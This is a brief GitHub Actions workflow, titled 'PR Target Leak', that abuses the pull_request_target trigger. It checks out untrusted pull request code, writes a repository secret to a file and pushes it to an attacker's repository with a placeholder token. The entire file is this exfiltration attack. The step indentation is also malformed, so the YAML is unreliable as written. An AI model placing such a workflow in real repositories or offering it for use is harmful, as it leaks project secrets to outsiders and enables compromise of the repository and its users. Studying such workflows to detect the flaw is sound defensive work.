name: PR Target Leak

on:
  pull_request_target:

jobs:
  leak-secrets:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - name: Read secret
    run: |
      echo "${{ secrets.TOP_SECRET }}" > secret.txt
      git config user.name "attacker"
      git config user.email "attacker@example.com"
      git add secret.txt
      git commit -m "leaked secret"
      git push https://<attacker-token>@github.com/attacker/repo.git HEAD:main
